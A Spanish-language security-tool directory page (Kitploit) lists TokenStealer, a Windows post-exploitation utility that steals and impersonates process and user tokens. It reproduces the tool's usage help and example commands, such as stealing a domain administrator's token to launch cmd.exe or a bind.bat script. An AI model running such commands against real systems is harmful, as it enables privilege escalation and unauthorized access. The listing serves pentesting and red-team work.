Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
TokenStealer — Utilidad de manipulación de tokens de Windows que enumera, roba y suplanta tokens de procesos o de usuarios para ejecutar comandos como otros usuarios, aprovechando los privilegios SeImpersonate y SeAssignPrimary. | Kitploit
Herramientas/GitHubGitHub/decoder-it/tokenstealer
Escalada de PrivilegiosHerramientas de SuplantaciónPost-ExplotaciónRed Teaming
GitHubdecoder-it/tokenstealer

TokenStealer

Utilidad de manipulación de tokens de Windows que enumera, roba y suplanta tokens de procesos o de usuarios para ejecutar comandos como otros usuarios, aprovechando los privilegios SeImpersonate y SeAssignPrimary.

Ver Repositorio
165286hace 2 añosRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

TokenStealer

Una herramienta sencilla que escribí hace un tiempo para robar y jugar con tokens de Windows.
Partes del código se han tomado y adaptado de https://github.com/FSecureLABS/incognito
Claramente, necesitarás el privilegio de Impersonación o AssignPrimary y el privilegio de Debug para acceder a todos los procesos.
Normalmente, ejecutarías la herramienta con los privilegios locales más altos, como SYSTEM.

root@kitploit:~
TokenStealer.exe
[+] My personal simple and stupid  Token Stealer... ;)
[+] v1.0 @decoder_it 2023

[!] Usage:
         -l: list all user's token
         -e: list all user's token with extended info -> [user]:[token_level (2)=Impersonation, (3)=Delegation,(P)=Primary>]:[pid]:[SessionId]
         -p: <pid> list/steal  token from specfic  process pid
         -u: <user> list/steal token of user
         -c: <command> command to execute with token 
         -t: force use of impersonation Privilege 
         -b: <token level> needed token type: 1=Primary,2=Impersonation,3=Delegation 
         -s: <SessionId> list/steal token from specific Session ID

=Examples=

TokenStealer.exe -e -b 1 
-> list all primary tokens

TokenStealer.exe -l -p 100
-> list all tokens in process pid 100

TokenStealer.exe -u  MYDOMAIN\administrator -c c:\windows\system32\cmd.exe
-> steal token of the user and execute an interactive  command shell using the AssingPrimary privilege if available

TokenStealer.exe -u  MYDOMAIN\administrator -c c:\windows\system32\bind.bat  -p 100 -t
-> steal token of the user in process 100 and execute the batch file using Impersonation privilege instead of AssingPrimary

TokenStealer.exe -u  MYDOMAIN\administrator -c c:\windows\system32\cmd.exe -b 1
-> steal a primary token of the user and execute an interactive  command shell using the AssingPrimary privilege if available

TokenStealer.exe -u  MYDOMAIN\administrator -c c:\windows\system32\cmd.exe -s 2
-> steal a token of the user in specific SessionID and execute an interactive  command shell using the AssingPrimary privilege if available

Alt text
Descargar herramienta